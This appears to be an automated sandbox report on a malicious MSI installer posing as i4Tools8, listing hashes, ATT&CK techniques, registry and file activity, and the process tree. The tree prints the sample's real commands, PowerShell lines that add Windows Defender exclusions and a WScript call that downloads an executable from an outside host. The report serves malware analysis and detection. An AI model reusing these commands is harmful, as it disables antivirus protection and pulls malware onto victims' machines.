8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14/09/2024, 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zuixinaisi.msi
Size

233.8MB
MD5

df0ddca33d18cef60dbfdad992a21ff3
SHA1

5db0a225c9713d93412d01c5df5398811e54d1e5
SHA256

8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
SHA512

e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
SSDEEP

6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD

Score

8^/10

defense_evasion discovery execution persistence privilege_escalation

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1664	WScript.exe
4	1664	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2848	powershell.exe
2896	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI697.tmp	msiexec.exe
File created	C:\Windows\Installer\f770551.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI90A.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File created	C:\Windows\Installer\f77054e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f77054e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI714.tmp	msiexec.exe
File created	C:\Windows\Installer\f770553.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f770551.ipi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI609.tmp	msiexec.exe

Executes dropped EXE 1 IoCs

pid	Process
2736	MSI90A.tmp

Loads dropped DLL 3 IoCs

pid	Process
1688	MsiExec.exe
1688	MsiExec.exe
1688	MsiExec.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2736	MSI90A.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
1352	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI90A.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe

Modifies registry class 23 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\ProductName = "i4Tools8"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\PackageCode = "D28B5C34E3416EF469BDECBAE57D671B"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\PackageName = "zuixinaisi.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB\MainFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Language = "2052"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2288	msiexec.exe
2288	msiexec.exe
2848	powershell.exe
2896	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1396	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1352	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeSecurityPrivilege	2288	msiexec.exe
Token: SeCreateTokenPrivilege	1352	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1352	msiexec.exe
Token: SeLockMemoryPrivilege	1352	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1352	msiexec.exe
Token: SeMachineAccountPrivilege	1352	msiexec.exe
Token: SeTcbPrivilege	1352	msiexec.exe
Token: SeSecurityPrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeLoadDriverPrivilege	1352	msiexec.exe
Token: SeSystemProfilePrivilege	1352	msiexec.exe
Token: SeSystemtimePrivilege	1352	msiexec.exe
Token: SeProfSingleProcessPrivilege	1352	msiexec.exe
Token: SeIncBasePriorityPrivilege	1352	msiexec.exe
Token: SeCreatePagefilePrivilege	1352	msiexec.exe
Token: SeCreatePermanentPrivilege	1352	msiexec.exe
Token: SeBackupPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeShutdownPrivilege	1352	msiexec.exe
Token: SeDebugPrivilege	1352	msiexec.exe
Token: SeAuditPrivilege	1352	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1352	msiexec.exe
Token: SeChangeNotifyPrivilege	1352	msiexec.exe
Token: SeRemoteShutdownPrivilege	1352	msiexec.exe
Token: SeUndockPrivilege	1352	msiexec.exe
Token: SeSyncAgentPrivilege	1352	msiexec.exe
Token: SeEnableDelegationPrivilege	1352	msiexec.exe
Token: SeManageVolumePrivilege	1352	msiexec.exe
Token: SeImpersonatePrivilege	1352	msiexec.exe
Token: SeCreateGlobalPrivilege	1352	msiexec.exe
Token: SeBackupPrivilege	2356	vssvc.exe
Token: SeRestorePrivilege	2356	vssvc.exe
Token: SeAuditPrivilege	2356	vssvc.exe
Token: SeBackupPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeLoadDriverPrivilege	2832	DrvInst.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeRestorePrivilege	2288	msiexec.exe
Token: SeTakeOwnershipPrivilege	2288	msiexec.exe
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1352	msiexec.exe
1352	msiexec.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 1688	2288	msiexec.exe	35
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2288 wrote to memory of 2736	2288	msiexec.exe	36
PID 2736 wrote to memory of 1396	2736	MSI90A.tmp	37
PID 2736 wrote to memory of 1396	2736	MSI90A.tmp	37
PID 2736 wrote to memory of 1396	2736	MSI90A.tmp	37
PID 2736 wrote to memory of 1396	2736	MSI90A.tmp	37
PID 1396 wrote to memory of 2848	1396	cmd.exe	39
PID 1396 wrote to memory of 2848	1396	cmd.exe	39
PID 1396 wrote to memory of 2848	1396	cmd.exe	39
PID 1396 wrote to memory of 2848	1396	cmd.exe	39
PID 1396 wrote to memory of 2896	1396	cmd.exe	40
PID 1396 wrote to memory of 2896	1396	cmd.exe	40
PID 1396 wrote to memory of 2896	1396	cmd.exe	40
PID 1396 wrote to memory of 2896	1396	cmd.exe	40
PID 1396 wrote to memory of 1664	1396	cmd.exe	41
PID 1396 wrote to memory of 1664	1396	cmd.exe	41
PID 1396 wrote to memory of 1664	1396	cmd.exe	41
PID 1396 wrote to memory of 1664	1396	cmd.exe	41

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1352

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AD8581B124C124DB56D9C7C26E5E0FD4
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1688
- C:\Windows\Installer\MSI90A.tmp
  "C:\Windows\Installer\MSI90A.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
  2⤵
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:1396
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\ProgramData
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2896
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:1664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000005C" "0000000000000498"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f770552.rbs

Filesize
7KB

MD5
1614f750432e0505390bd55758007ed8

SHA1
cb86d7c425a2ac68b0570a0a05328956920a5a83

SHA256
faf23b8710f4ab7ffee3831cafb14e93d24917b493d366b7d15a6311710e73c1

SHA512
f6c3a8aafed58a75248a9040bad3977d9a0b65c3758b36777ada8351993a156e79fb9ca599aa27772efdeeeb1e182ec0680693e7e9646c2a207714bbe8900375

Download Submit
C:\ProgramData\DownloadFile.vbs

Filesize
407B

MD5
2ff09853906bcaed82ddb57baca8eb1f

SHA1
95bf628e54a9eff2ac434fedc78193846def0139

SHA256
591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795

SHA512
b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740

Download Submit
C:\ProgramData\i4Tools8.bat

Filesize
1KB

MD5
10e4067312ac3173043783d46c328a99

SHA1
ec03017d71370619f553cd77b615ef6e2c781ff3

SHA256
048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf

SHA512
1f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d0f962880d50303626a08a7e3d05e83b

SHA1
09fc519b1fcbc9435924c5a400e12e900398a800

SHA256
db1ba89fcc308f8495c3bdca253e02e657875729db7345a9197cdf18bf542694

SHA512
50f7061a6d99a33e43298823176783020a028569895381eb6e8a26d4993f50de85bb3e956cb73f0b9e7353fb6429ed0be21d507c8f0e707a98c36ea888bf231d

Download Submit
C:\Windows\Installer\MSI609.tmp

Filesize
587KB

MD5
c7fbd5ee98e32a77edf1156db3fca622

SHA1
3e534fc55882e9fb940c9ae81e6f8a92a07125a0

SHA256
e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6

SHA512
8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

Download Submit
C:\Windows\Installer\MSI90A.tmp

Filesize
419KB

MD5
cac0eaeb267d81cf3fa968ee23a6af9d

SHA1
cf6ae8e44fb4949d5f0b01b110eaba49d39270a2

SHA256
f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774

SHA512
8edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b

Download Submit